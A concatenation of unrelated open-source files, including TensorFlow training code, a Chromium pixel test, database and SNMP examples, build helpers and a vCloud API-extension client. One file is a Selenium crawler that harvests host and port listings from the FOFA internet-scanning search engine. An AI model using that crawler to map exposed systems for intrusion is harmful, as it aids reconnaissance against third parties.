#self.train_op = self.optim.minimize(self.loss, global_step=self.global_step)
self.writer = tf.train.SummaryWriter("./logs/D_CNN_pretrained_sample", self.sess.graph)
tf.initialize_all_variables().run()
self.saver = tf.train.Saver(var_list=self.D_params_dict, max_to_keep=30)
# assign the G matrix to D pretrain
self.sess.run(self.embedding_assign_op)
count = 0
for idx in range(self.max_iter//3000):
self.save(self.checkpoint_dir, count)
self.evaluate('test', count)
self.evaluate('train', count)
for k in tqdm(range(3000)):
right_images, right_text, _ = self.dataset.sequential_sample(self.batch_size)
fake_images, fake_text, _ = self.negative_dataset.sequential_sample(self.batch_size)
wrong_text = self.dataset.get_wrong_text(self.batch_size)
images = np.concatenate((right_images, right_images, fake_images), axis=0)
text = np.concatenate((right_text, wrong_text, fake_text.astype('int32')), axis=0)
label = np.zeros((text.shape[0], self.num_classes))
# right -> first entry
# wrong -> second entry
# fake -> third entry
label[:self.batch_size, 0] = 1
label[self.batch_size:2*self.batch_size, 1] = 1
label[2*self.batch_size:, 2] = 1
_, loss, summary_str = self.sess.run([self.train_op, self.loss, self.loss_sum],{
self.text: text.astype('int32'),
self.images: images,
self.label: label
})
self.writer.add_summary(summary_str, count)
count += 1
def evaluate(self, split, count):
if split == 'test':
num_test_pair = -1
elif split == 'train':
num_test_pair = 5000
right_images, right_text, _ = self.dataset.get_paired_data(num_test_pair, phase=split)
# the true paired data we get
num_test_pair = len(right_images)
fake_images, fake_text, _ = self.negative_dataset.get_paired_data(num_test_pair, phase=split)
random_idx = range(num_test_pair)
np.random.shuffle(random_idx)
wrong_text = np.squeeze(right_text[random_idx, :])
count = 0.
loss_t = []
right_acc_t = []
wrong_acc_t = []
fake_acc_t = []
for i in range(num_test_pair//self.batch_size):
right_images_batch = right_images[i*self.batch_size:(i+1)*self.batch_size,:]
fake_images_batch = fake_images[i*self.batch_size:(i+1)*self.batch_size,:]
right_text_batch = right_text[i*self.batch_size:(i+1)*self.batch_size,:]
fake_text_batch = fake_text[i*self.batch_size:(i+1)*self.batch_size,:]
wrong_text_batch = wrong_text[i*self.batch_size:(i+1)*self.batch_size,:]
text_batch = np.concatenate((right_text_batch, wrong_text_batch, fake_text_batch.astype('int32')), axis=0)
images_batch = np.concatenate((right_images_batch, right_images_batch, fake_images_batch), axis=0)
label = np.zeros((text_batch.shape[0], self.num_classes))
# right -> first entry
# wrong -> second entry
# fake -> third entry
label[:self.batch_size, 0] = 1
label[self.batch_size:2*self.batch_size, 1] = 1
label[2*self.batch_size:, 2] = 1
feed_dict = {self.images:images_batch, self.text:text_batch, self.label:label}
loss, pred, loss_str = self.sess.run([self.loss, self.pred, self.loss_sum], feed_dict)
loss_t.append(loss)
right_acc_t.append(np.sum((np.argmax(label[:self.batch_size],1)==pred[:self.batch_size])+0))
wrong_acc_t.append(np.sum((np.argmax(label[self.batch_size:2*self.batch_size],1)==pred[self.batch_size:2*self.batch_size])+0))
fake_acc_t.append(np.sum((np.argmax(label[2*self.batch_size:],1)==pred[2*self.batch_size:])+0))
count += self.batch_size
print "Phase =", split.capitalize()
print "======================= Loss ====================="
print '[$] Loss =', np.mean(loss_t)
print "======================= Acc ======================"
print '[$] Right Pair Acc. =', sum(right_acc_t)/count
print '[$] Wrong Pair Acc. =', sum(wrong_acc_t)/count
print '[$] Fake Pair Acc. =', sum(fake_acc_t)/count
def save(self, checkpoint_dir, step):
model_name = "D_Pretrained"
model_dir = "%s" % (self.dataset.dataset_name)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir, "D_CNN_pretrained_sample")
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoints...")
model_dir = "%s" % (self.dataset.dataset_name)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
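# Illustrative note (not part of the original model): for each filter size f, the
# convolution in build_Discriminator spans max_words - f + 1 positions and the max-pool
# with ksize [1, max_words - f + 1, 1, 1] collapses them to one value per filter, so the
# flattened h_pool_flat has width num_filters_total = sum(num_filters). With made-up
# sizes filter_sizes=[3, 4, 5] and num_filters=[100, 100, 100] that width is 300.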
|
content/test/gpu/gpu_tests/maps.py
|
iplo/Chain
| 231 |
67114
|
<filename>content/test/gpu/gpu_tests/maps.py<gh_stars>100-1000
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs a Google Maps pixel test.
Performs several common navigation actions on the map (pan, zoom, rotate) then
captures a screenshot and compares selected pixels against expected values"""
import json
import optparse
import os
import cloud_storage_test_base
import maps_expectations
from telemetry import test
from telemetry.core import bitmap
from telemetry.core import util
from telemetry.page import page_test
from telemetry.page import page_set
class MapsValidator(cloud_storage_test_base.ValidatorBase):
def __init__(self):
super(MapsValidator, self).__init__('ValidatePage')
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')
def ValidatePage(self, page, tab, results):
# TODO: This should not be necessary, but it's not clear if the test is
# failing on the bots in it's absence. Remove once we can verify that it's
# safe to do so.
MapsValidator.SpinWaitOnRAF(tab, 3)
if not tab.screenshot_supported:
raise page_test.Failure('Browser does not support screenshot capture')
screenshot = tab.Screenshot(5)
if not screenshot:
raise page_test.Failure('Could not capture screenshot')
dpr = tab.EvaluateJavaScript('window.devicePixelRatio')
expected = self._ReadPixelExpectations(page)
try:
self._CompareToExpectations(screenshot, expected, dpr)
except page_test.Failure:
image_name = self._UrlToImageName(page.display_name)
if self.options.test_machine_name:
self._UploadErrorImagesToCloudStorage(image_name, screenshot, None)
else:
self._WriteErrorImages(self.options.generated_dir, image_name,
screenshot, None)
raise
@staticmethod
def SpinWaitOnRAF(tab, iterations, timeout = 60):
waitScript = r"""
window.__spinWaitOnRAFDone = false;
var iterationsLeft = %d;
function spin() {
iterationsLeft--;
if (iterationsLeft == 0) {
window.__spinWaitOnRAFDone = true;
return;
}
window.requestAnimationFrame(spin);
}
window.requestAnimationFrame(spin);
""" % iterations
def IsWaitComplete():
return tab.EvaluateJavaScript('window.__spinWaitOnRAFDone')
tab.ExecuteJavaScript(waitScript)
util.WaitFor(IsWaitComplete, timeout)
def _ReadPixelExpectations(self, page):
expectations_path = os.path.join(page._base_dir, page.pixel_expectations)
with open(expectations_path, 'r') as f:
json_contents = json.load(f)
return json_contents
def _CompareToExpectations(self, screenshot, expectations, devicePixelRatio):
for expectation in expectations:
location = expectation["location"]
x = location[0] * devicePixelRatio
y = location[1] * devicePixelRatio
if x < 0 or y < 0 or x > screenshot.width or y > screenshot.height:
raise page_test.Failure(
'Expected pixel location [%d, %d] is out of range on [%d, %d] image' %
(x, y, screenshot.width, screenshot.height))
pixel_color = screenshot.GetPixelColor(x, y)
expect_color = bitmap.RgbaColor(
expectation["color"][0],
expectation["color"][1],
expectation["color"][2])
iter_result = pixel_color.IsEqual(expect_color, expectation["tolerance"])
if not iter_result:
raise page_test.Failure('Expected pixel at ' + str(location) +
' to be ' +
str(expectation["color"]) + " but got [" +
str(pixel_color.r) + ", " +
str(pixel_color.g) + ", " +
str(pixel_color.b) + "]")
class Maps(cloud_storage_test_base.TestBase):
"""Google Maps pixel tests."""
test = MapsValidator
@staticmethod
def AddTestCommandLineOptions(parser):
group = optparse.OptionGroup(parser, 'Maps test options')
cloud_storage_test_base.TestBase._AddTestCommandLineOptions(parser, group)
parser.add_option_group(group)
def CreateExpectations(self, page_set):
return maps_expectations.MapsExpectations()
def CreatePageSet(self, options):
page_set_path = os.path.join(
util.GetChromiumSrcDir(), 'content', 'test', 'gpu', 'page_sets')
page_set_dict = {
'archive_data_file': 'data/maps.json',
'make_javascript_deterministic': False,
'pages': [
{
'name': 'Maps.maps_001',
'url': 'http://localhost:10020/tracker.html',
# TODO: Hack to prevent maps from scaling due to window size.
# Remove when the maps team provides a better way of overriding this
# behavior
'script_to_evaluate_on_commit': 'window.screen = null;',
'navigate_steps': [
{ 'action': 'navigate' },
{ 'action': 'wait', 'javascript': 'window.testDone' }
],
'pixel_expectations': 'data/maps_001_expectations.json'
}
]
}
return page_set.PageSet.FromDict(page_set_dict, page_set_path)
|
python/runtime/dbapi/__init__.py
|
hebafer/sqlflow
| 4,742 |
67119
|
# Copyright 2020 The SQLFlow Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# NOTE(sneaxiy): do not import the XxxConnection object outside the
# following method. It is because those imports are quite slow (about 1-2s),
# making that the normal SQL statement runs very slow.
def get_connection_object(driver):
if driver == "mysql":
from runtime.dbapi.mysql import MySQLConnection
return MySQLConnection
elif driver == "hive":
from runtime.dbapi.hive import HiveConnection
return HiveConnection
elif driver == "maxcompute":
from runtime.dbapi.maxcompute import MaxComputeConnection
return MaxComputeConnection
elif driver == "paiio":
from runtime.dbapi.paiio import PaiIOConnection
return PaiIOConnection
else:
raise ValueError("unsupported driver type %s" % driver)
def connect(uri):
"""Connect to given uri
Params:
uri: a valid URI string
Returns:
A Connection object
Raises:
ValueError if the uri is not valid or can't find given driver
"""
parts = uri.split("://")
if len(parts) < 2:
raise ValueError("Input should be a valid uri.", uri)
return get_connection_object(parts[0])(uri)
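# Illustrative usage sketch (not part of the module): connect() only inspects the URI
# scheme to pick a driver class and hands the full URI to that class. The credentials,
# host and database below are placeholders, not a URI format guaranteed by SQLFlow.
def _example_connect():
    return connect("mysql://user:password@127.0.0.1:3306/iris")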
|
OthertCrawler/0x08fofa/Fofa_spider.py
|
wangbl11/ECommerceCrawlers
| 3,469 |
67120
|
<gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__author__ = 'AJay'
__mtime__ = '2019/5/13 0013'
"""
import base64
import random
import time
import pymongo
from pyquery import PyQuery as pq
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
class Fofa():
def __init__(self,config):
        self.WRITE_MODE = config[
            'write_mode']  # Output formats for the results, a list that may contain txt, csv, json, mongo and mysql
        self.FOFA_USERNAME = config['fofa_username']  # fofa account username
        self.FOFA_PASSWORD = config['fofa_password']  # fofa account password
self.PAGE = config['page']
self.MONGO_URL = 'localhost'
self.MONGO_DB = 'fofa'
self.MONGO_TABLE = 'message'
self._init_db()
self._init_browser()
def _init_db(self):
        # Connect to the MongoDB database
client = pymongo.MongoClient(self.MONGO_URL)
self.db = client[self.MONGO_DB]
def _init_browser(self):
        # Initialize the browser
self.browser = webdriver.Chrome(service_args=['--load-images=false', '--disk-cache=true'])
self.wait = WebDriverWait(self.browser, 10)
self.browser.set_window_size(1400, 900)
def login_fofa(self):
try:
self.browser.get('https://i.nosec.org/login?service=https%3A%2F%2Ffofa.so%2Fusers%2Fservice')
input_user = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#username')))
input_pass = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#password')))
submit = self.wait.until(EC.element_to_be_clickable(
(By.CSS_SELECTOR, '#login-form > table > tbody > tr:nth-child(4) > td > button')))
input_user.send_keys(self.FOFA_USERNAME)
input_pass.send_keys(self.FOFA_PASSWORD)
submit.click()
self.browser.implicitly_wait(30)
except TimeoutException:
return self.login_fofa()
def turn_to_start_page(self):
qbase = base64.b64encode(self.q.encode(encoding="utf-8"))
starturl = 'https://fofa.so/result?page={}&qbase64={}#will_page'.format(self.now_page, str(qbase, 'utf-8'))
self.browser.get(url=starturl)
    # Turn to the next page
def next_page(self):
try:
submit_next = self.wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#will_page > a.next_page')))
self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#ajax_content')))
self.get_products()
submit_next.click()
            # wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,'#will_page > em'),str(page_number)))  # very slow
except TimeoutException:
            print('Retrying: turning to next page')
return self.next_page()
    # Fetch the data
def get_products(self):
try:
self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#ajax_content')))
except Exception as e:
self.turn_to_start_page()
# browser.implicitly_wait(30)
html = self.browser.page_source
doc = pq(html)
items = doc('.list_main .list_mod_all #ajax_content .download_loader .list_mod').items()
for item in items:
product = {
'url': item.find('.list_mod_t').text(),
'info': item.find('.list_mod_c .row .col-lg-4 .list_sx1').text(),
'flag': 0,
'type': '博彩'
}
print(product)
self.save_to_mongo(product)
            # # Output format: any combination of scheme, ip and port, freely adjustable; currently http://domain:80 https://domain:443 domain:3389
# url= item.find('.list_mod_t').text()
# url_list = url.split('\n')
# domain=url_list[0]
# port = url_list[1]
# if port=='80':
# domain='http://'+domain
# result = domain+':'+port+'\n'
# self.save_text(result)
def save_to_txt(self,result):
        # Save as txt, as requested by the security staff
        with open('result.txt', 'a+') as f:
f.write(result+'\n')
pass
    # Save to MongoDB
def save_to_mongo(self, result):
try:
if self.db[self.MONGO_TABLE].insert(result):
pass
# print('sucess', result)
except Exception:
print('faild', result)
def main(self, q):
self.login_fofa()
self.q = q
# search(str1)
self.now_page = 1
self.turn_to_start_page()
for i in range(self.now_page, int(self.PAGE)):
            print('Page', i)
self.now_page = i
self.next_page()
time.sleep(random.randint(3, 6))
self.browser.quit()
import os
import sys
import json
def main():
try:
config_path = os.path.split(
os.path.realpath(__file__))[0] + os.sep + 'config.json'
if not os.path.isfile(config_path):
            sys.exit(u'Config file config.json does not exist in current path: %s' %
                     (os.path.split(os.path.realpath(__file__))[0] + os.sep))
with open(config_path) as f:
try:
config = json.loads(f.read())
except ValueError:
                sys.exit(u'config.json format is invalid, please refer to ')
fofa = Fofa(config)
        fofa.start()  # crawl fofa data
except Exception as e:
print('Error: ', e)
if __name__ == '__main__':
main()
|
examples/hlapi/v3arch/asyncore/sync/manager/cmdgen/preload-pysnmp-mibs.py
|
flaviut/pysnmp
| 492 |
67137
|
"""
Preload PySNMP MIBs
+++++++++++++++++++
Send a series of SNMP GETNEXT requests using the following options:
* with SNMPv3 with user 'usr-md5-des', MD5 auth and DES privacy protocols
* over IPv4/UDP
* to an Agent at demo.snmplabs.com:161
* for all OIDs starting from 1.3.6
* preload all Python MIB modules found in search path
Functionally similar to:
| $ snmpwalk -v3 -l authPriv -u usr-md5-des -A authkey1 -X privkey1 -m ALL demo.snmplabs.com:161 1.3.6
"""#
from pysnmp.hlapi import *
iterator = nextCmd(
SnmpEngine(),
UsmUserData('usr-md5-des', 'authkey1', 'privkey1'),
UdpTransportTarget(('demo.snmplabs.com', 161)),
ContextData(),
ObjectType(ObjectIdentity('1.3.6').loadMibs())
)
for errorIndication, errorStatus, errorIndex, varBinds in iterator:
if errorIndication:
print(errorIndication)
break
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
break
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind]))
|
utime/hypnogram/__init__.py
|
aluquecerp/U-Time
| 138 |
67139
|
<gh_stars>100-1000
from .hypnograms import SparseHypnogram, DenseHypnogram
|
bootstrapvz/common/tools.py
|
zeridon/bootstrap-vz
| 207 |
67162
|
from __future__ import print_function
import os
def log_check_call(command, stdin=None, env=None, shell=False, cwd=None):
status, stdout, stderr = log_call(command, stdin, env, shell, cwd)
from subprocess import CalledProcessError
if status != 0:
e = CalledProcessError(status, ' '.join(command), '\n'.join(stderr))
# Fix Pyro4's fixIronPythonExceptionForPickle() by setting the args property,
# even though we use our own serialization (at least I think that's the problem).
# See bootstrapvz.remote.serialize_called_process_error for more info.
setattr(e, 'args', (status, ' '.join(command), '\n'.join(stderr)))
raise e
return stdout
def log_call(command, stdin=None, env=None, shell=False, cwd=None):
import subprocess
import logging
from multiprocessing.dummy import Pool as ThreadPool
from os.path import realpath
command_log = realpath(command[0]).replace('/', '.')
log = logging.getLogger(__name__ + command_log)
if isinstance(command, list):
log.debug('Executing: {command}'.format(command=' '.join(command)))
else:
log.debug('Executing: {command}'.format(command=command))
process = subprocess.Popen(args=command, env=env, shell=shell, cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin is not None:
log.debug(' stdin: ' + stdin)
process.stdin.write(stdin + "\n")
process.stdin.flush()
process.stdin.close()
stdout = []
stderr = []
def handle_stdout(line):
log.debug(line)
stdout.append(line)
def handle_stderr(line):
log.error(line)
stderr.append(line)
handlers = {process.stdout: handle_stdout,
process.stderr: handle_stderr}
def stream_readline(stream):
for line in iter(stream.readline, ''):
handlers[stream](line.strip())
pool = ThreadPool(2)
pool.map(stream_readline, [process.stdout, process.stderr])
pool.close()
pool.join()
process.wait()
return process.returncode, stdout, stderr
def sed_i(file_path, pattern, subst, expected_replacements=1):
replacement_count = inline_replace(file_path, pattern, subst)
if replacement_count != expected_replacements:
from .exceptions import UnexpectedNumMatchesError
msg = ('There were {real} instead of {expected} matches for '
'the expression `{exp}\' in the file `{path}\''
.format(real=replacement_count, expected=expected_replacements,
exp=pattern, path=file_path))
raise UnexpectedNumMatchesError(msg)
def inline_replace(file_path, pattern, subst):
import fileinput
import re
replacement_count = 0
for line in fileinput.input(files=file_path, inplace=True):
(replacement, count) = re.subn(pattern, subst, line)
replacement_count += count
print(replacement, end='')
return replacement_count
def load_json(path):
import json
from json_minify import json_minify
with open(path) as stream:
return json.loads(json_minify(stream.read(), False))
def load_yaml(path):
import yaml
with open(path, 'r') as stream:
return yaml.safe_load(stream)
def load_data(path):
filename, extension = os.path.splitext(path)
if not os.path.isfile(path):
raise Exception('The path {path} does not point to a file.'.format(path=path))
if extension == '.json':
return load_json(path)
elif extension == '.yml' or extension == '.yaml':
return load_yaml(path)
else:
raise Exception('Unrecognized extension: {ext}'.format(ext=extension))
def config_get(path, config_path):
config = load_data(path)
for key in config_path:
config = config.get(key)
return config
def copy_tree(from_path, to_path):
from shutil import copy
for abs_prefix, dirs, files in os.walk(from_path):
prefix = os.path.normpath(os.path.relpath(abs_prefix, from_path))
for path in dirs:
full_path = os.path.join(to_path, prefix, path)
if os.path.exists(full_path):
if os.path.isdir(full_path):
continue
else:
os.remove(full_path)
os.mkdir(full_path)
for path in files:
copy(os.path.join(abs_prefix, path),
os.path.join(to_path, prefix, path))
def rel_path(base, path):
return os.path.normpath(os.path.join(os.path.dirname(base), path))
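def _example_usage():
    # Illustrative helper (not part of bootstrap-vz): shows the calling conventions of
    # the helpers above -- an argv-style list for log_check_call and a regex plus
    # replacement for sed_i. The command and file path are made-up examples and this
    # function is never invoked by the module itself.
    output_lines = log_check_call(['hostname', '--fqdn'])
    sed_i('/tmp/example.conf', r'^Port 22$', 'Port 2222')
    return output_lines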
|
test/models/test_gin.py
|
rlckd159/deep-graph-matching-consensus
| 194 |
67179
|
from itertools import product
import torch
from dgmc.models import GIN
def test_gin():
model = GIN(16, 32, num_layers=2, batch_norm=True, cat=True, lin=True)
assert model.__repr__() == ('GIN(16, 32, num_layers=2, batch_norm=True, '
'cat=True, lin=True)')
x = torch.randn(100, 16)
edge_index = torch.randint(100, (2, 400), dtype=torch.long)
for cat, lin in product([False, True], [False, True]):
model = GIN(16, 32, 2, True, cat, lin)
out = model(x, edge_index)
assert out.size() == (100, 16 + 2 * 32 if not lin and cat else 32)
assert out.size() == (100, model.out_channels)
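# Illustrative note (not part of the original test): the expected width above follows
# from GIN's concatenation option -- with cat=True and lin=False the output stacks the
# 16 input channels with each of the 2 layers' 32 hidden channels (16 + 2 * 32 = 80),
# while every other cat/lin combination is projected down to out_channels = 32.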
|
pyvcloud/vcd/api_extension.py
|
lrivallain/pyvcloud
| 168 |
67195
|
# VMware vCloud Director Python SDK
# Copyright (c) 2018 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import E_VMEXT
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import QueryResultFormat
from pyvcloud.vcd.client import RelationType
from pyvcloud.vcd.client import ResourceType
from pyvcloud.vcd.exceptions import MissingRecordException
from pyvcloud.vcd.exceptions import MultipleRecordsException
from pyvcloud.vcd.exceptions import OperationNotSupportedException
from pyvcloud.vcd.utils import to_dict
class APIExtension(object):
ATTRIBUTES = [
'name', 'namespace', 'enabled', 'exchange', 'routingKey', 'priority',
'isAuthorizationEnabled', 'href', 'id'
]
def __init__(self, client):
"""Constructor for APIExtension object.
:param pyvcloud.vcd.client.Client client: the client that will be used
to make REST calls to vCD.
"""
self.client = client
def list_extensions(self):
"""Fetch the API extension services defined in the system.
:return: all the registered API extension services in the system.
:rtype: list
"""
try:
records = self.client.get_typed_query(
ResourceType.ADMIN_SERVICE.value,
query_result_format=QueryResultFormat.ID_RECORDS).execute()
except OperationNotSupportedException:
msg = 'User doesn\'t have permission to view extensions.'
raise OperationNotSupportedException(msg)
return [to_dict(r, self.ATTRIBUTES) for r in records]
def _get_extension_record(self,
name,
namespace=None,
format=QueryResultFormat.ID_RECORDS):
"""Fetch info about a particular API extension service as a record.
:param str name: the name of the extension service whose info we want
to retrieve.
:param str namespace: the namespace of the extension service. If
omitted, all extension services matching the given name will be
retrieved and that would lead to a MultipleRecordsException.
:param format QueryResultFormat: dictates whether id or href should be
part of the returned record. By default id is returned.
:return: the extension service record.
:rtype: lxml.objectify.ObjectifiedElement object containing
AdminServiceRecord XML data representing the service.
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
        :raises MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
qfilter = 'name==%s' % urllib.parse.quote(name)
if namespace is not None:
qfilter += ';namespace==%s' % urllib.parse.quote(namespace)
try:
ext = self.client.get_typed_query(
ResourceType.ADMIN_SERVICE.value,
qfilter=qfilter,
query_result_format=format).find_unique()
except OperationNotSupportedException:
msg = 'User doesn\'t have permission to interact with extensions.'
raise OperationNotSupportedException(msg)
except MissingRecordException:
msg = 'API Extension service (name:' + name
if namespace is not None:
msg += ', namespace:' + namespace
msg += ') not found.'
raise MissingRecordException(msg)
except MultipleRecordsException:
            msg = 'Found multiple API Extension services with (name:' + name
if namespace is not None:
msg += ', namespace:' + namespace + ').'
else:
msg += '). Consider providing value for the namespace.'
raise MultipleRecordsException(msg)
return ext
def get_extension(self, name, namespace=None):
"""Fetch info about a particular API extension service.
:param str name: the name of the extension service whose info we want
to retrieve.
:param str namespace: the namespace of the extension service.
:return: information about the extension service.
:rtype: dict
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
ext_record = self._get_extension_record(name, namespace)
return to_dict(ext_record, self.ATTRIBUTES)
    def get_extension_xml(self, extension_id):
        """Fetch the raw XML representation of an API extension service.
        :param str extension_id: the id of the extension service.
        :return: the XML representation of the extension service.
        """
        uri = f"{self.client.get_api_uri()}/admin/extension/service/{extension_id}"  # noqa: E501
        try:
            return self.client.get_resource(uri)
        except Exception as err:
            raise Exception(
                f"Failed to get extension XML with error: {err}") from err
def get_extension_info(self, name, namespace=None):
"""Return info about an API extension, including filters.
:param str name: the name of the extension service whose info we want
to retrieve.
        :param str namespace: the namespace of the extension service. If
            omitted, the lookup is performed by name alone, which raises a
            MultipleRecordsException when several services share that name.
:return: information about the extension.
:rtype: dict
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
ext = self.get_extension(name, namespace)
filters = self.get_api_filters(ext['id'])
n = 1
for f in filters:
ext['filter_%s' % n] = f.get('urlPattern')
n += 1
return ext
def update_extension(self, name, namespace=None, routing_key=None,
exchange=None, description=None):
"""Update properties for an existing API extension.
:param str name: name of the API extension.
:param str namespace: namespace of the API extension.
:param str routing_key: AMQP routing key to use for the extension.
:param str exchange: AMQP exchange to use for the extension.
:return: href of the API extension.
:rtype: str
:raises MissingRecordException: if an extension with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
record = self._get_extension_record(name=name,
namespace=namespace,
format=QueryResultFormat.RECORDS)
params = E_VMEXT.Service({'name': name})
description = description or record.get('description')
if description is not None:
params.append(E.Description(description))
params.append(E_VMEXT.Namespace(record.get('namespace')))
params.append(E_VMEXT.Enabled(record.get('enabled')))
params.append(E_VMEXT.RoutingKey(
routing_key if routing_key else record.get('routingKey')))
params.append(E_VMEXT.Exchange(
exchange if exchange else record.get('exchange')))
self.client.put_resource(record.get('href'), params, None)
return record.get('href')
def add_extension(self, name, namespace, routing_key, exchange, patterns,
description=None):
"""Add an API extension service.
:param str name: name of the new API extension service.
:param str namespace: namespace of the new API extension service.
:param str routing_key: AMQP routing key to use with the extension.
:param str exchange: AMQP exchange to use with the extension.
:param list patterns: list of url API filters to register with the
extension.
:return: object containing EntityType.ADMIN_SERVICE XML data i.e. the
sparse representation of the API extension.
:rtype: lxml.objectify.ObjectifiedElement
"""
params = E_VMEXT.Service({'name': name})
if description is not None:
params.append(E.Description(description))
params.append(E_VMEXT.Namespace(namespace))
params.append(E_VMEXT.Enabled('true'))
params.append(E_VMEXT.RoutingKey(routing_key))
params.append(E_VMEXT.Exchange(exchange))
filters = E_VMEXT.ApiFilters()
for pattern in patterns:
filters.append(
E_VMEXT.ApiFilter(E_VMEXT.UrlPattern(pattern.strip())))
params.append(filters)
ext = self.client.get_extension()
ext_services = self.client.get_linked_resource(
ext, RelationType.DOWN, EntityType.EXTENSION_SERVICES.value)
return self.client.post_linked_resource(ext_services, RelationType.ADD,
EntityType.ADMIN_SERVICE.value,
params)
def enable_extension(self, name, enabled=True, namespace=None):
"""Enable or disable an API extension service.
        :param str name: the name of the extension service which we want to
            enable/disable.
        :param str namespace: the namespace of the extension service. If
            omitted, the lookup is performed by name alone, which raises a
            MultipleRecordsException when several services share that name.
:param bool enabled: flag to enable or disable the extension.
:return: href of the service being enabled/disabled.
:rtype: str
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
record = self._get_extension_record(name=name,
namespace=namespace,
format=QueryResultFormat.RECORDS)
params = E_VMEXT.Service({'name': name})
params.append(E_VMEXT.Namespace(record.get('namespace')))
params.append(E_VMEXT.Enabled('true' if enabled else 'false'))
params.append(E_VMEXT.RoutingKey(record.get('routingKey')))
params.append(E_VMEXT.Exchange(record.get('exchange')))
self.client.put_resource(record.get('href'), params, None)
return record.get('href')
def delete_extension(self, name, namespace):
"""Delete an API extension service.
        :param str name: the name of the extension service which we want to
            delete.
        :param str namespace: the namespace of the extension service.
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
href = self.enable_extension(name, enabled=False, namespace=namespace)
return self.client.delete_resource(href)
def get_api_filters(self, service_id, format=QueryResultFormat.ID_RECORDS):
"""Fetch the API filters defined for the service.
:param str service_id: the id of the extension service.
        :param QueryResultFormat format: dictates whether id or href should be
            part of the returned record. By default id is returned.
:return: API filters registered for the API extension.
:rtype: generator object
"""
try:
records = self.client.get_typed_query(
ResourceType.API_FILTER.value,
equality_filter=('service', service_id),
query_result_format=format).execute()
except OperationNotSupportedException:
msg = 'User doesn\'t have permission to view api filters.'
raise OperationNotSupportedException(msg)
return records
def remove_all_api_filters_from_service(self, name, namespace=None):
"""."""
ext_record = self._get_extension_record(name=name, namespace=namespace)
api_filter_records = self.get_api_filters(
service_id=ext_record.get('id'),
format=QueryResultFormat.REFERENCES)
for record in api_filter_records:
api_filter = self.client.get_resource(uri=record.get('href'))
self.client.delete_linked_resource(
resource=api_filter, rel=RelationType.REMOVE, media_type=None)
def add_api_filters_to_service(self, name, patterns, namespace=None):
"""."""
ext_record = self._get_extension_record(
name=name, namespace=namespace,
format=QueryResultFormat.REFERENCES)
ext = self.client.get_resource(uri=ext_record.get('href'))
for pattern in patterns:
api_filter = E_VMEXT.ApiFilter(E_VMEXT.UrlPattern(pattern.strip()))
self.client.post_linked_resource(
resource=ext, rel=RelationType.ADD,
media_type=EntityType.API_FILTER.value, contents=api_filter)
def add_service_right(self, right_name, service_name, namespace,
description, category, bundle_key):
"""Add a new right using API extension service.
:param str right_name: the name of the new right to be registered.
:param str service_name: the name of the extension service whose
record we want to retrieve.
:param str namespace: the namespace of the extension service.
:param str description: brief description about the new right.
:param str category: add the right in existing categories in
vCD Roles and Rights or specify a new category name.
:param str bundle_key: is used to identify the right name and change
its value to different languages using localization bundle.
:return: object containing EntityType.RIGHT XML data i.e. the
sparse representation of the Right element.
:rtype: lxml.objectify.ObjectifiedElement
"""
params = E.Right({'name': right_name})
params.append(E.Description(description))
params.append(E.Category(category))
params.append(E.BundleKey(bundle_key))
record = self._get_extension_record(name=service_name,
namespace=namespace,
format=QueryResultFormat.RECORDS)
